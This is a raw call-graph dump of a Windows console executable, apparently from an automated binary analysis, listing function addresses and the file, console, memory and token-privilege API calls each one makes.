cc3742 75087->75090 75360 ca1e40 free 75090->75360 75091->75086 75361 ca1089 malloc _CxxThrowException free _CxxThrowException 75091->75361 75362 ca31e5 malloc _CxxThrowException free _CxxThrowException 75091->75362 75093 cb6633 75093->74913 75093->74917 75094 ca1089 malloc _CxxThrowException free _CxxThrowException 75093->75094 75094->74917 75095->74913 75096->74916 75098 cc8fae __EH_prolog 75097->75098 75099 cc7ebb free 75098->75099 75100 cc8ff2 75099->75100 75131 cc8b64 75100->75131 75103 cb6302 75103->74890 75103->74892 75103->74916 75105 cc9020 75105->75103 75106 ca2fec 3 API calls 75105->75106 75107 cc903a 75106->75107 75120 cc904d 75107->75120 75135 cc8b80 VariantClear 75107->75135 75109 cc9244 75140 ca43b7 5 API calls 2 library calls 75109->75140 75110 cc91b0 75138 cc8b9c 10 API calls 2 library calls 75110->75138 75111 cc9144 75114 ca2f88 3 API calls 75111->75114 75118 cc917b 75111->75118 75114->75118 75115 cc91c0 75115->75103 75124 ca2f88 3 API calls 75115->75124 75116 cc9100 75119 ca965d VariantClear 75116->75119 75117 cc90d6 75117->75116 75122 cc90e7 75117->75122 75137 cc8f2e 9 API calls 75117->75137 75118->75109 75118->75110 75119->75103 75120->75103 75120->75111 75120->75116 75120->75117 75136 ca3097 malloc _CxxThrowException free SysStringLen ctype 75120->75136 75125 ca965d VariantClear 75122->75125 75129 cc91ff 75124->75129 75125->75111 75126 cc9112 75126->75116 75127 cc8b64 VariantClear 75126->75127 75128 cc9123 75127->75128 75128->75116 75128->75122 75129->75103 75139 ca50ff free ctype 75129->75139 75132 cc8b05 VariantClear 75131->75132 75133 cc8b6f 75132->75133 75133->75103 75134 cc8f2e 9 API calls 75133->75134 75134->75105 75135->75120 75136->75117 75137->75126 75138->75115 75139->75103 75140->75103 75141->74930 75142->74939 75143->74946 75144->74948 75145->74952 75146->74961 75147->74943 75148->74943 75149->74960 75150->74960 75151->74962 75152->74968 75153->74935 75155 cb54ca __EH_prolog 75154->75155 75157 ca965d VariantClear 75155->75157 75159 cb5507 75155->75159 75156 ca965d VariantClear 75158 cb5567 75156->75158 75160 cb5528 75157->75160 75158->74974 75158->74975 75159->75156 75160->75159 75161 cb5572 75160->75161 75162 ca965d VariantClear 75161->75162 75163 cb558e 75162->75163 75294 cb4cac VariantClear __EH_prolog 75163->75294 75165 cb55a1 75165->75158 75295 cb4cac VariantClear __EH_prolog 75165->75295 75167 cb55b8 75167->75158 75296 cb4cac VariantClear __EH_prolog 75167->75296 75170 cb563a __EH_prolog 75169->75170 75172 cb5679 75170->75172 75297 cc3558 10 API calls 2 library calls 75170->75297 75173 ca2f1c 2 API calls 75172->75173 75189 cb571a 75172->75189 75174 cb5696 75173->75174 75298 cc3333 malloc _CxxThrowException free 75174->75298 75176 cb56a2 75177 cb56ad 75176->75177 75178 cb56c5 75176->75178 75299 cb7853 5 API calls 2 library calls 75177->75299 75179 cb56b4 75178->75179 75300 ca4adf wcscmp 75178->75300 75182 cb5707 75179->75182 75302 ca1089 malloc _CxxThrowException free _CxxThrowException 75179->75302 75303 ca31e5 malloc _CxxThrowException free _CxxThrowException 75182->75303 75183 cb56d2 75183->75179 75301 cb7853 5 API calls 2 library calls 75183->75301 75186 cb5712 75304 ca1e40 free 75186->75304 75189->74979 75191 cb58c8 __EH_prolog 75190->75191 75192 ca2e04 2 API calls 75191->75192 75193 cb58e9 75192->75193 75194 ca6c72 44 API calls 75193->75194 75195 cb58fd 75194->75195 75196 cb5905 75195->75196 75200 cb5b2d 75195->75200 75269->74981 75270->74986 75271->74988 75272->75009 75273->75024 75277->75001 75278->75013 75281->75033 75292->75012 75293->74974 75294->75165 75295->75167 75296->75158 75297->75172 75298->75176 75299->75179 75300->75183 75301->75179 75302->75182 75303->75186 75304->75189 75360->75093 75361->75091 75362->75091 75363 cab5d9 75364 cab5e6 75363->75364 75365 cab5f7 75363->75365 75364->75365 75369 cab5fe 75364->75369 75370 cab608 __EH_prolog 75369->75370 75376 d26a40 VirtualFree 75370->75376 75372 cab63d 75373 ca764c CloseHandle 75372->75373 75374 cab5f1 75373->75374 75375 ca1e40 free 75374->75375 75375->75365 75376->75372 75377 d26bc6 75378 d26bca 75377->75378 75379 d26bcd 75377->75379 75379->75378 75380 d26bd1 malloc 75379->75380 75380->75378 75381 cb1ade 75382 cb1ae8 __EH_prolog 75381->75382 75432 ca13f5 75382->75432 75385 cb1b32 6 API calls 75387 cb1b8d 75385->75387 75396 cb1bf8 75387->75396 75450 cb1ea4 9 API calls 75387->75450 75388 cb1b24 _CxxThrowException 75388->75385 75390 cb1bdf 75451 ca27bb 75390->75451 75394 cb1c89 75446 cb1eb9 75394->75446 75396->75394 75458 cc1d73 5 API calls __EH_prolog 75396->75458 75400 cb1cb2 _CxxThrowException 75400->75394 75433 ca13ff __EH_prolog 75432->75433 75434 cc7ebb free 75433->75434 75435 ca142b 75434->75435 75436 ca1438 75435->75436 75459 ca1212 free ctype 75435->75459 75438 ca1e0c ctype 2 API calls 75436->75438 75442 ca144d 75438->75442 75439 ca14f4 75439->75385 75449 cc1d73 5 API calls __EH_prolog 75439->75449 75440 ce04d2 5 API calls 75440->75442 75442->75439 75442->75440 75444 ca1507 75442->75444 75460 ca1265 5 API calls 2 library calls 75442->75460 75461 ca1524 malloc _CxxThrowException __EH_prolog ctype 75442->75461 75445 ca2fec 3 API calls 75444->75445 75445->75439 75462 ca9313 GetCurrentProcess OpenProcessToken 75446->75462 75449->75388 75450->75390 75452 ca27c7 75451->75452 75453 ca27e3 75451->75453 75452->75453 75454 ca1e0c ctype 2 API calls 75452->75454 75457 ca1e40 free 75453->75457 75455 ca27da 75454->75455 75469 ca1e40 free 75455->75469 75457->75396 75458->75400 75459->75436 75460->75442 75461->75442 75463 ca933a LookupPrivilegeValueW 75462->75463 75464 ca9390 75462->75464 75465 ca934c AdjustTokenPrivileges 75463->75465 75466 ca9382 75463->75466 75465->75466 75467 ca9372 GetLastError 75465->75467 75468 ca9385 CloseHandle 75466->75468 75467->75468 75468->75464 75469->75453 75470 cb459e 75471 cb45ab 75470->75471 75472 cb45bc 75470->75472 75471->75472 75476 cb45c3 75471->75476 75477 cb45cd __EH_prolog 75476->75477 75505 cb79b2 free ctype 75477->75505 75479 cb45e8 75506 ca1e40 free 75479->75506 75481 cb45f3 75507 cd2db9 free ctype 75481->75507 75483 cb4609 75508 ca1e40 free 75483->75508 75485 cb4610 75509 ca1e40 free 75485->75509 75487 cb461b 75510 ca1e40 free 75487->75510 75489 cb4626 75511 cb794c free ctype 75489->75511 75491 cb4638 75512 cd2db9 free ctype 75491->75512 75493 cb465b 75513 ca1e40 free 75493->75513 75495 cb468e 75514 ca1e40 free 75495->75514 75497 cb46ae 75515 cb4733 free __EH_prolog ctype 75497->75515 75499 cb46be 75516 ca1e40 free 75499->75516 75501 cb46e8 75517 ca1e40 free 75501->75517 75503 cb45b6 75504 ca1e40 free 75503->75504 75504->75472 75505->75479 75506->75481 75507->75483 75508->75485 75509->75487 75510->75489 75511->75491 75512->75493 75513->75495 75514->75497 75515->75499 75516->75501 75517->75503 75518 ca42d1 75519 ca42bd 75518->75519 75520 ca42c5 75519->75520 75521 ca1e0c ctype 2 API calls 75519->75521 75521->75520 75522 cdacd3 75523 cdace0 75522->75523 75524 cdacf1 75522->75524 75523->75524 75528 cdacf8 75523->75528 75533 cdc0b3 __EH_prolog 75528->75533 75529 cdc0ed 75545 ca1e40 free 75529->75545 75531 cdaceb 75535 ca1e40 free 75531->75535 75533->75529 75536 cc7193 75533->75536 75544 ca1e40 free 75533->75544 75535->75524 75537 cc719d __EH_prolog 75536->75537 75546 cd2db9 free ctype 75537->75546 75539 cc71b3 75547 cc71d5 free __EH_prolog ctype 75539->75547 75541 cc71bf 75548 ca1e40 free 75541->75548 75543 cc71c7 75543->75533 75544->75533 75545->75531 75546->75539 75547->75541 75548->75543 75549 cda42c 75550 cda449 75549->75550 75551 cda435 fputs 75549->75551 75708 cd545d 75550->75708 75707 ca1fa0 fputc 75551->75707 75555 ca2e04 2 API calls 75556 cda4a1 75555->75556 75712 cc1858 75556->75712 75558 cda4c9 75774 ca1e40 free 75558->75774 75560 cda4d8 75561 cda4ee 75560->75561 75775 cdc7d7 75560->75775 75563 cda50e 75561->75563 75783 cd57fb 75561->75783 75793 cdc73e 75563->75793 75568 cdac17 75971 cd2db9 free ctype 75568->75971 75569 ca1e0c ctype 2 API calls 75571 cda53a 75569->75571 75573 cda54d 75571->75573 75929 cdb0fa malloc _CxxThrowException __EH_prolog 75571->75929 75572 cdac23 75574 cdac3a 75572->75574 75577 cdac35 75572->75577 75579 ca2fec 3 API calls 75573->75579 75973 cdb96d _CxxThrowException 75574->75973 75972 cdb988 33 API calls __aulldiv 75577->75972 75578 cdac42 75974 ca1e40 free 75578->75974 75585 cda586 75579->75585 75582 cdac4d 75975 cc3247 75582->75975 75811 cdad06 75585->75811 75684 cdaae5 75970 cd2db9 free ctype 75684->75970 75707->75550 75709 cd5466 75708->75709 75710 cd5473 75708->75710 75985 ca275e malloc _CxxThrowException free ctype 75709->75985 75710->75555 75713 cc1862 __EH_prolog 75712->75713 75986 cc021a 75713->75986 75718 cc18b9 76000 cc1aa5 free __EH_prolog ctype 75718->76000 75720 cc1935 76005 cc1aa5 free __EH_prolog ctype 75720->76005 75721 cc18c7 76001 cd2db9 free ctype 75721->76001 75725 cc1944 75746 cc1966 75725->75746 76006 cc1d73 5 API calls __EH_prolog 75725->76006 75726 cc18d3 75726->75558 75727 ce04d2 5 API calls 75733 cc18db 75727->75733 75729 cc1958 _CxxThrowException 75729->75746 75730 cc19be 76009 ccf1f1 malloc _CxxThrowException free _CxxThrowException 75730->76009 75732 ca2e04 2 API calls 75732->75746 75733->75720 75733->75727 76002 cc0144 malloc _CxxThrowException free _CxxThrowException 75733->76002 76003 ca1524 malloc _CxxThrowException __EH_prolog ctype 75733->76003 76004 ca1e40 free 75733->76004 75736 cc19d6 75737 cc7ebb free 75736->75737 75739 cc19e1 75737->75739 75738 ca631f 9 API calls 75738->75746 75740 cb12d4 4 API calls 75739->75740 75742 cc19ea 75740->75742 75741 ce04d2 5 API calls 75741->75746 75743 cc7ebb free 75742->75743 75745 cc19f7 75743->75745 75747 cb12d4 4 API calls 75745->75747 75746->75730 75746->75732 75746->75738 75746->75741 76007 ca1524 malloc _CxxThrowException __EH_prolog ctype 75746->76007 76008 ca1e40 free 75746->76008 75756 cc19ff 75747->75756 75749 cc1a4f 76011 ca1e40 free 75749->76011 75751 cc1a57 76012 cd2db9 free ctype 75751->76012 75753 ca1524 malloc _CxxThrowException 75753->75756 75754 cc1a64 76013 cd2db9 free ctype 75754->76013 75756->75749 75756->75753 75758 cc1a83 75756->75758 76010 ca42e3 CharUpperW 75756->76010 76014 cc1d73 5 API calls __EH_prolog 75758->76014 75760 cc1a97 _CxxThrowException 75761 cc1aa5 __EH_prolog 75760->75761 76015 ca1e40 free 75761->76015 75763 cc1ac8 76016 cc02e8 free ctype 75763->76016 75765 cc1ad1 76017 cc1eab free __EH_prolog ctype 75765->76017 75767 cc1add 76018 ca1e40 free 75767->76018 75769 cc1ae5 76019 ca1e40 free 75769->76019 75771 cc1aed 76020 cd2db9 free ctype 75771->76020 75773 cc1afa 75773->75558 75774->75560 75776 cdc849 75775->75776 75777 cdc7ea 75775->75777 75779 cdc85a 75776->75779 76149 ca1f91 fflush 75776->76149 75778 cdc7fe fputs 75777->75778 76148 ca25cb malloc _CxxThrowException free _CxxThrowException ctype 75777->76148 75778->75776 75779->75561 75784 cd5805 __EH_prolog 75783->75784 75792 cd5847 75784->75792 76150 ca26dd 75784->76150 75790 cd583f 76170 ca1e40 free 75790->76170 75792->75563 75794 cdc748 __EH_prolog 75793->75794 75795 cdc7d7 ctype 6 API calls 75794->75795 75796 cdc75d 75795->75796 76209 ca1e40 free 75796->76209 75798 cdc768 75799 cc2c0b ctype free 75798->75799 75800 cdc775 75799->75800 76210 ca1e40 free 75800->76210 75802 cdc77d 76211 ca1e40 free 75802->76211 75804 cdc785 76212 ca1e40 free 75804->76212 75806 cdc78d 76213 ca1e40 free 75806->76213 75808 cdc795 75809 cc2c0b ctype free 75808->75809 75810 cda51d 75809->75810 75810->75569 75810->75684 76214 cdad29 75811->76214 75814 cdbf3e 75815 ca2fec 3 API calls 75814->75815 75816 cdbf85 75815->75816 75817 ca2fec 3 API calls 75816->75817 75929->75573 75970->75568 75971->75572 75972->75574 75973->75578 75974->75582 75976 cc324e 75975->75976 75977 cc3260 75976->75977 76932 ca1e40 free 75976->76932 76931 ca1e40 free 75977->76931 75980 cc3267 75985->75710 75987 cc0224 __EH_prolog 75986->75987 76021 cb3d66 75987->76021 75990 cc062e 75997 cc0638 __EH_prolog 75990->75997 75991 cc06de 76108 cc019a malloc _CxxThrowException free memcpy 75991->76108 75993 cc06e6 76109 cc1453 26 API calls 2 library calls 75993->76109 75994 cc01bc malloc _CxxThrowException free _CxxThrowException memcpy 75994->75997 75997->75991 75997->75994 75999 cc06ee 75997->75999 76037 cc0703 75997->76037 76107 cd2db9 free ctype 75997->76107 75999->75718 75999->75733 76000->75721 76001->75726 76002->75733 76003->75733 76004->75733 76005->75725 76006->75729 76007->75746 76008->75746 76009->75736 76010->75756 76011->75751 76012->75754 76013->75726 76014->75760 76015->75763 76016->75765 76017->75767 76018->75769 76019->75771 76020->75773 76032 d3fb10 76021->76032 76023 cb3d70 GetCurrentProcess 76033 cb3e04 76023->76033 76025 cb3d8d OpenProcessToken 76026 cb3d9e LookupPrivilegeValueW 76025->76026 76027 cb3de3 76025->76027 76026->76027 76028 cb3dc0 AdjustTokenPrivileges 76026->76028 76029 cb3e04 CloseHandle 76027->76029 76028->76027 76030 cb3dd5 GetLastError 76028->76030 76031 cb3def 76029->76031 76030->76027 76031->75990 76032->76023 76034 cb3e0d 76033->76034 76035 cb3e11 CloseHandle 76033->76035 76034->76025 76036 cb3e21 76035->76036 76036->76025 76085 cc070d __EH_prolog 76037->76085 76038 cc0e1d 76145 cc0416 18 API calls 2 library calls 76038->76145 76040 cc0ea6 76147 ceec78 free ctype 76040->76147 76041 cc0d11 76139 ca7496 7 API calls 2 library calls 76041->76139 76042 cc0c13 76136 ca1e40 free 76042->76136 76044 ca2da9 2 API calls 76044->76085 76048 cc0de0 76141 cd2db9 free ctype 76048->76141 76049 ca2da9 2 API calls 76076 cc0ab5 76049->76076 76050 cc0e47 76050->76040 76146 cc117d 68 API calls 2 library calls 76050->76146 76051 cc0c83 76051->76038 76051->76041 76052 cc0b40 76052->75997 76053 ca2f1c 2 API calls 76082 cc0d29 76053->76082 76055 cc0df8 76143 ca1e40 free 76055->76143 76056 ca2e04 2 API calls 76056->76085 76058 ca2e04 2 API calls 76058->76076 76062 cc0e02 76144 cd2db9 free ctype 76062->76144 76063 ca2e04 2 API calls 76063->76082 76065 ca2fec 3 API calls 76065->76085 76069 ca2fec 3 API calls 76069->76082 76070 ca2fec 3 API calls 76070->76076 76074 cc050b 44 API calls 76074->76076 76076->76042 76076->76049 76076->76058 76076->76070 76076->76074 76086 ca1e40 free ctype 76076->76086 76091 cc0c79 76076->76091 76127 ca2f4a malloc _CxxThrowException free ctype 76076->76127 76132 ca1089 malloc _CxxThrowException free _CxxThrowException 76076->76132 76133 cc13eb 5 API calls 2 library calls 76076->76133 76134 cc0ef4 68 API calls 2 library calls 76076->76134 76135 cd2db9 free ctype 76076->76135 76137 cc0021 GetLastError 76076->76137 76077 cc0df3 76142 ca1e40 free 76077->76142 76081 ce04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76081->76085 76082->76048 76082->76053 76082->76055 76082->76063 76082->76069 76082->76077 76083 ca1e40 free ctype 76082->76083 76140 cc117d 68 API calls 2 library calls 76082->76140 76083->76082 76084 cc0b30 76129 ca1e40 free 76084->76129 76085->76044 76085->76051 76085->76052 76085->76056 76085->76065 76085->76076 76085->76081 76094 cd2db9 free ctype 76085->76094 76101 cc0b48 76085->76101 76103 cc0b26 76085->76103 76104 ca1524 malloc _CxxThrowException 76085->76104 76105 ca1e40 free ctype 76085->76105 76110 ca2f4a malloc _CxxThrowException free ctype 76085->76110 76111 ca1089 malloc _CxxThrowException free _CxxThrowException 76085->76111 76112 cc13eb 5 API calls 2 library calls 76085->76112 76113 cc050b 76085->76113 76118 cc0021 GetLastError 76085->76118 76119 ca49bd 9 API calls 2 library calls 76085->76119 76120 cc0306 12 API calls 76085->76120 76121 cbff00 5 API calls 2 library calls 76085->76121 76122 cc057d 16 API calls 2 library calls 76085->76122 76123 cc0f8e 24 API calls 2 library calls 76085->76123 76124 ca472e CharUpperW 76085->76124 76125 cb8984 malloc _CxxThrowException free _CxxThrowException memcpy 76085->76125 76126 cc0ef4 68 API calls 2 library calls 76085->76126 76086->76076 76090 cc0b38 76130 ca1e40 free 76090->76130 76138 ca1e40 free 76091->76138 76094->76085 76131 cd2db9 free ctype 76101->76131 76128 ca1e40 free 76103->76128 76104->76085 76105->76085 76107->75997 76108->75993 76109->75999 76110->76085 76111->76085 76112->76085 76114 ca6c72 44 API calls 76113->76114 76117 cc051e 76114->76117 76115 cc0575 76115->76085 76116 ca2f88 3 API calls 76116->76115 76117->76115 76117->76116 76118->76085 76119->76085 76120->76085 76121->76085 76122->76085 76123->76085 76124->76085 76125->76085 76126->76085 76127->76076 76128->76084 76129->76090 76130->76052 76131->76103 76132->76076 76133->76076 76134->76076 76135->76076 76136->76052 76137->76076 76138->76051 76139->76082 76140->76082 76141->76052 76142->76055 76143->76062 76144->76052 76145->76050 76146->76050 76147->76052 76148->75778 76149->75779 76151 ca1e0c ctype 2 API calls 76150->76151 76152 ca26ea 76151->76152 76153 cd5678 76152->76153 76154 cd5689 76153->76154 76155 cd56b1 76153->76155 76156 cd5593 6 API calls 76154->76156 76171 cd5593 76155->76171 76159 cd56a5 76156->76159 76185 ca28a1 76159->76185 76163 cd570e fputs 76169 ca1fa0 fputc 76163->76169 76165 cd56ef 76166 cd5593 6 API calls 76165->76166 76167 cd5701 76166->76167 76168 cd5711 6 API calls 76167->76168 76168->76163 76169->75790 76170->75792 76172 cd55ad 76171->76172 76173 ca28a1 5 API calls 76172->76173 76174 cd55b8 76173->76174 76190 ca286d 76174->76190 76177 ca28a1 5 API calls 76178 cd55c7 76177->76178 76179 cd5711 76178->76179 76180 cd56e0 76179->76180 76181 cd5721 76179->76181 76180->76163 76189 ca2881 malloc _CxxThrowException free memcpy _CxxThrowException 76180->76189 76182 ca28a1 5 API calls 76181->76182 76183 cd572b 76182->76183 76198 cd55cd 6 API calls 76183->76198 76186 ca28b0 76185->76186 76186->76186 76199 ca267f 76186->76199 76188 ca28bf 76188->76155 76189->76165 76193 ca1e9d 76190->76193 76194 ca1ea8 76193->76194 76195 ca1ead 76193->76195 76197 ca263c malloc _CxxThrowException free memcpy _CxxThrowException 76194->76197 76195->76177 76197->76195 76198->76180 76200 ca26c2 76199->76200 76202 ca2693 76199->76202 76200->76188 76201 ca26c8 _CxxThrowException 76203 ca26dd 76201->76203 76202->76201 76204 ca26bc 76202->76204 76205 ca1e0c ctype 2 API calls 76203->76205 76208 ca2595 malloc _CxxThrowException free memcpy ctype 76204->76208 76207 ca26ea 76205->76207 76207->76188 76208->76200 76209->75798 76210->75802 76211->75804 76212->75806 76213->75808 76215 cdad33 __EH_prolog 76214->76215 76216 ca2e04 2 API calls 76215->76216 76217 cdad5f 76216->76217 76218 ca2e04 2 API calls 76217->76218 76219 cda5d8 76218->76219 76219->75814 76931->75980 76932->75976 76936 d269f0 free 76937 d3ffb1 __setusermatherr 76938 d3ffbd 76937->76938 76943 d40068 _controlfp 76938->76943 76940 d3ffc2 _initterm __getmainargs _initterm __p___initenv 76941 cdc27c 76940->76941 76942 d4001d exit _XcptFilter 76941->76942 76943->76940 76944 cb1368 76946 cb136d 76944->76946 76947 cb138c 76946->76947 76950 d37d80 WaitForSingleObject 76946->76950 76953 cdf745 76946->76953 76957 d37ea0 SetEvent GetLastError 76946->76957 76951 d37d98 76950->76951 76952 d37d8e GetLastError 76950->76952 76951->76946 76952->76951 76954 cdf74f __EH_prolog 76953->76954 76958 cdf784 76954->76958 76956 cdf765 76956->76946 76957->76946 76959 cdf78e __EH_prolog 76958->76959 76960 cb12d4 4 API calls 76959->76960 76961 cdf7c7 76960->76961 76962 cb12d4 4 API calls 76961->76962 76963 cdf7d4 76962->76963 76964 cdf871 76963->76964 76967 d26b23 VirtualAlloc 76963->76967 76968 cac4d6 76963->76968 76964->76956 76967->76964 76972 cac4e9 76968->76972 76969 cac6f3 76969->76964 76970 cb111c 10 API calls 76970->76972 76971 cb11b4 107 API calls 76971->76972 76972->76969 76972->76970 76972->76971 76973 cac695 memmove 76972->76973 76973->76972 76974 cebf67 76975 cebf85 76974->76975 76976 cebf74 76974->76976 76976->76975 76980 cebf8c 76976->76980 76981 cebf96 __EH_prolog 76980->76981 76997 ced144 76981->76997 76985 cebfd0 77004 ca1e40 free 76985->77004 76987 cebfdb 77005 ca1e40 free 76987->77005 76989 cebfe6 77006 cec072 free ctype 76989->77006 76991 cebff4 77007 cbaafa free VariantClear ctype 76991->77007 76993 cec023 77008 cc73d2 free VariantClear __EH_prolog ctype 76993->77008 76995 cebf7f 76996 ca1e40 free 76995->76996 76996->76975 76999 ced14e __EH_prolog 76997->76999 76998 ced1b7 free 77000 ced180 76998->77000 76999->76998 77009 ce8e04 memset 77000->77009 77002 cebfc5 77003 ca1e40 free 77002->77003 77003->76985 77004->76987 77005->76989 77006->76991 77007->76993 77008->76995 77009->77002 77010 ca7b20 77013 ca7ab2 77010->77013 77014 ca7ac5 77013->77014 77015 ca759a 12 API calls 77014->77015 77016 ca7ade 77015->77016 77017 ca7b03 77016->77017 77018 ca7aeb SetFileTime 77016->77018 77021 ca7919 77017->77021 77018->77017 77022 ca7aac 77021->77022 77023 ca793c 77021->77023 77023->77022 77024 ca7945 DeviceIoControl 77023->77024 77025 ca7969 77024->77025 77026 ca79e6 77024->77026 77025->77026 77032 ca79a7 77025->77032 77027 ca79ef DeviceIoControl 77026->77027 77029 ca7a14 77026->77029 77028 ca7a22 DeviceIoControl 77027->77028 77027->77029 77028->77029 77030 ca7a44 DeviceIoControl 77028->77030 77029->77022 77038 ca780d 8 API calls ctype 77029->77038 77030->77029 77037 ca9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 77032->77037 77033 ca7aa5 77035 ca77de 5 API calls 77033->77035 77035->77022 77036 ca79d0 77036->77026 77037->77036 77038->77033 77039 cdc2e6 77040 cdc52f 77039->77040 77043 cd544f SetConsoleCtrlHandler 77040->77043 77042 cdc53b 77043->77042 77044 cd993d 77128 cdb5b1 77044->77128 77047 cd9963 77134 cb1f33 77047->77134 77048 ca1fb3 11 API calls 77048->77047 77050 cd9975 77051 cd99ce 77050->77051 77052 cd99b7 GetStdHandle GetConsoleScreenBufferInfo 77050->77052 77053 ca1e0c ctype 2 API calls 77051->77053 77052->77051 77054 cd99dc 77053->77054 77255 cc7b48 77054->77255 77056 cd9a29 77272 cdb96d _CxxThrowException 77056->77272 77058 cd9a30 77273 cc7018 8 API calls 2 library calls 77058->77273 77060 cd9a7c 77274 ccddb5 6 API calls 2 library calls 77060->77274 77061 cd9a66 _CxxThrowException 77061->77060 77063 cd9aa6 77065 cd9aaa _CxxThrowException 77063->77065 77066 cd9ac0 77063->77066 77064 cd9a37 77064->77060 77064->77061 77065->77066 77067 cd9b3a 77066->77067 77069 cd9bfa _CxxThrowException 77066->77069 77275 cc7dd7 7 API calls 2 library calls 77066->77275 77276 cdc077 6 API calls 77066->77276 77277 ca1e40 free 77066->77277 77278 ca1fa0 fputc 77067->77278 77123 cd9be6 77069->77123 77071 cd9b63 fputs 77279 ca1fa0 fputc 77071->77279 77074 cd9b79 strlen strlen 77076 cd9baa fputs fputc 77074->77076 77077 cd9e25 77074->77077 77076->77123 77287 ca1fa0 fputc 77077->77287 77079 cd9e2c fputs 77288 ca1fa0 fputc 77079->77288 77081 cd9f0c 77293 ca1fa0 fputc 77081->77293 77085 cdb67d 12 API calls 77085->77123 77086 cd9f13 fputs 77090 ca2e04 2 API calls 77090->77123 77100 ca31e5 malloc _CxxThrowException free _CxxThrowException 77100->77123 77105 cd9d2a fputs 77284 ca21d8 fputs 77105->77284 77110 cd9d5f fputs 77110->77123 77114 cd9e42 77114->77081 77121 cd9ee0 fputs 77114->77121 77289 cdb650 fputc fputs fputs fputc 77114->77289 77290 ca21d8 fputs 77114->77290 77291 cdbde4 fputc fputs 77114->77291 77292 ca1fa0 fputc 77121->77292 77123->77076 77123->77077 77123->77085 77123->77090 77123->77100 77123->77105 77123->77110 77280 ca21d8 fputs 77123->77280 77281 ca315e malloc _CxxThrowException free _CxxThrowException 77123->77281 77282 ca3221 malloc _CxxThrowException free _CxxThrowException 77123->77282 77283 ca1089 malloc _CxxThrowException free _CxxThrowException 77123->77283 77285 ca1fa0 fputc 77123->77285 77286 ca1e40 free 77123->77286 77129 cdb5bc fputs 77128->77129 77130 cd994a 77128->77130 77306 ca1fa0 fputc 77129->77306 77130->77047 77130->77048 77132 cdb5d5 77132->77130 77133 cdb5d9 fputs 77132->77133 77133->77130 77135 cb1f4f 77134->77135 77136 cb1f6c 77134->77136 77339 cc1d73 5 API calls __EH_prolog 77135->77339 77307 cb29eb 77136->77307 77139 cb1f5e _CxxThrowException 77139->77136 77141 cb1fa3 77143 cb1fbc 77141->77143 77145 ca4fc0 5 API calls 77141->77145 77146 cb1fda 77143->77146 77147 ca2fec 3 API calls 77143->77147 77144 cb1f95 _CxxThrowException 77144->77141 77145->77143 77148 cb2022 wcscmp 77146->77148 77157 cb2036 77146->77157 77147->77146 77149 cb20af 77148->77149 77148->77157 77341 cc1d73 5 API calls __EH_prolog 77149->77341 77151 cb20a9 77342 cb393c 6 API calls 2 library calls 77151->77342 77152 cb20be _CxxThrowException 77152->77157 77154 cb20f4 77343 cb393c 6 API calls 2 library calls 77154->77343 77156 cb2108 77158 cb2135 77156->77158 77344 cb2e04 62 API calls 2 library calls 77156->77344 77157->77151 77160 cb219a 77157->77160 77164 cb2159 77158->77164 77345 cb2e04 62 API calls 2 library calls 77158->77345 77346 cc1d73 5 API calls __EH_prolog 77160->77346 77163 cb21a9 _CxxThrowException 77163->77164 77165 cb227f 77164->77165 77167 cb2245 77164->77167 77347 cc1d73 5 API calls __EH_prolog 77164->77347 77312 cb2aa9 77165->77312 77170 ca2fec 3 API calls 77167->77170 77171 cb225c 77170->77171 77171->77165 77348 cc1d73 5 API calls __EH_prolog 77171->77348 77172 cb22d9 77175 cb2302 77172->77175 77177 ca2fec 3 API calls 77172->77177 77173 cb2237 _CxxThrowException 77173->77167 77174 ca2fec 3 API calls 77174->77172 77178 ca4fc0 5 API calls 77175->77178 77177->77175 77180 cb2315 77178->77180 77179 cb2271 _CxxThrowException 77179->77165 77330 cb384c 77180->77330 77182 cb2322 77183 cb26c6 77182->77183 77191 cb23a1 77182->77191 77184 cb28ce 77183->77184 77185 cb2700 77183->77185 77361 cc1d73 5 API calls __EH_prolog 77183->77361 77186 cb293a 77184->77186 77196 cb28d5 77184->77196 77362 cb32ec 14 API calls 2 library calls 77185->77362 77189 cb293f 77186->77189 77190 cb29a5 77186->77190 77369 ca4eec 16 API calls 77189->77369 77193 cb29ae _CxxThrowException 77190->77193 77246 cb264d 77190->77246 77199 cb247a wcscmp 77191->77199 77216 cb248e 77191->77216 77192 cb26f2 _CxxThrowException 77192->77185 77194 cb2713 77197 cb3a29 5 API calls 77194->77197 77196->77246 77368 cc1d73 5 API calls __EH_prolog 77196->77368 77210 cb2722 77197->77210 77198 cb294c 77370 ca4ea1 8 API calls 77198->77370 77202 cb24cf wcscmp 77199->77202 77199->77216 77205 cb24ef wcscmp 77202->77205 77202->77216 77208 cb250f 77205->77208 77205->77216 77206 cb2953 77209 ca4fc0 5 API calls 77206->77209 77207 cb2920 _CxxThrowException 77207->77246 77352 cc1d73 5 API calls __EH_prolog 77208->77352 77209->77246 77213 cb27cf 77210->77213 77214 ca2fec 3 API calls 77210->77214 77212 cb251e _CxxThrowException 77215 cb252c 77212->77215 77217 cb2880 77213->77217 77220 cb281f 77213->77220 77364 cc1d73 5 API calls __EH_prolog 77213->77364 77218 cb27a9 77214->77218 77222 cb2569 77215->77222 77353 cb2e04 62 API calls 2 library calls 77215->77353 77216->77215 77349 ca4eec 16 API calls 77216->77349 77350 ca4ea1 8 API calls 77216->77350 77351 cc1d73 5 API calls __EH_prolog 77216->77351 77221 cb289b 77217->77221 77225 ca2fec 3 API calls 77217->77225 77218->77213 77363 ca3563 memmove 77218->77363 77220->77217 77231 cb2847 77220->77231 77365 cc1d73 5 API calls __EH_prolog 77220->77365 77221->77246 77367 cc1d73 5 API calls __EH_prolog 77221->77367 77224 cb258c 77222->77224 77354 cb2e04 62 API calls 2 library calls 77222->77354 77229 cb25a4 77224->77229 77355 cb2a61 malloc _CxxThrowException free _CxxThrowException memcpy 77224->77355 77225->77221 77226 cb24c1 _CxxThrowException 77226->77202 77356 ca4eec 16 API calls 77229->77356 77230 cb2811 _CxxThrowException 77230->77220 77231->77217 77366 cc1d73 5 API calls __EH_prolog 77231->77366 77238 cb25ad 77357 cc1b07 49 API calls 77238->77357 77239 cb28c0 _CxxThrowException 77239->77184 77240 cb2839 _CxxThrowException 77240->77231 77241 cb2872 _CxxThrowException 77241->77217 77243 cb25b4 77358 ca4ea1 8 API calls 77243->77358 77245 cb25bb 77247 ca2fec 3 API calls 77245->77247 77249 cb25d6 77245->77249 77246->77050 77247->77249 77248 cb261f 77248->77246 77251 ca2fec 3 API calls 77248->77251 77249->77246 77249->77248 77359 cc1d73 5 API calls __EH_prolog 77249->77359 77253 cb263f 